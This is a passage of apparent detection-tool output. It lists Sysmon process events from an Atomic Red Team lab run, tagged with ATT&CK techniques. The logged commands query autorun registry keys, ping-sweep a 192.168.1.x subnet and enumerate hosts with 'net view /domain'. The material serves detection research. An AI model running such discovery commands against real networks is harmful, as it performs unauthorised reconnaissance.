<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.937862,2019-07-19T18:49:32.937862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.921206Z"">
</TimeCreated>
<EventRecordID>3701</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.900</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-00107C693100</Data>
<Data Name=""ProcessId"">1740</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.868916,2019-07-19T18:49:32.868916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.850894Z"">
</TimeCreated>
<EventRecordID>3699</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.842</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010E1643100</Data>
<Data Name=""ProcessId"">5936</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.807707,2019-07-19T18:49:32.807707+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.789067Z"">
</TimeCreated>
<EventRecordID>3697</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.775</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-001056603100</Data>
<Data Name=""ProcessId"">6832</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547895.038554,2019-07-19T18:51:35.038554+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:35.014760Z"">
</TimeCreated>
<EventRecordID>3773</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:34.991</Data>
<Data Name=""ProcessGuid"">747F3D96-D8F6-5D31-0000-001091D13300</Data>
<Data Name=""ProcessId"">4528</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547895.01476,2019-07-19T18:51:35.014760+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:34.797834Z"">
</TimeCreated>
<EventRecordID>3772</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:34.779</Data>
<Data Name=""ProcessGuid"">747F3D96-D8F6-5D31-0000-00100FCB3300</Data>
<Data Name=""ProcessId"">3344</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:22.333688Z"">
</TimeCreated>
<EventRecordID>3771</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:22.330</Data>
<Data Name=""ProcessGuid"">747F3D96-D8EA-5D31-0000-00108AB83300</Data>
<Data Name=""ProcessId"">4684</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net view</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8EA-5D31-0000-001030B63300</Data>
<Data Name=""ParentProcessId"">1988</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1018] Remote System Discovery - Process,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:22.333688Z"">
</TimeCreated>
<EventRecordID>3771</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:22.330</Data>
<Data Name=""ProcessGuid"">747F3D96-D8EA-5D31-0000-00108AB83300</Data>
<Data Name=""ProcessId"">4684</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net view</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8EA-5D31-0000-001030B63300</Data>
<Data Name=""ParentProcessId"">1988</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547882.333688,2019-07-19T18:51:22.333688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:22.314203Z"">
</TimeCreated>
<EventRecordID>3770</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:22.302</Data>
<Data Name=""ProcessGuid"">747F3D96-D8EA-5D31-0000-001030B63300</Data>
<Data Name=""ProcessId"">1988</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:09.845415Z"">
</TimeCreated>
<EventRecordID>3769</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:09.839</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DD-5D31-0000-001043953300</Data>
<Data Name=""ProcessId"">3012</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net view /domain</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8DD-5D31-0000-0010EF923300</Data>
<Data Name=""ParentProcessId"">4856</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view /domain&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1018] Remote System Discovery - Process,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:09.845415Z"">
</TimeCreated>
<EventRecordID>3769</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:09.839</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DD-5D31-0000-001043953300</Data>
<Data Name=""ProcessId"">3012</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net view /domain</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8DD-5D31-0000-0010EF923300</Data>
<Data Name=""ParentProcessId"">4856</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view /domain&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547869.845415,2019-07-19T18:51:09.845415+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view /domain&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:09.823311Z"">
</TimeCreated>
<EventRecordID>3768</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
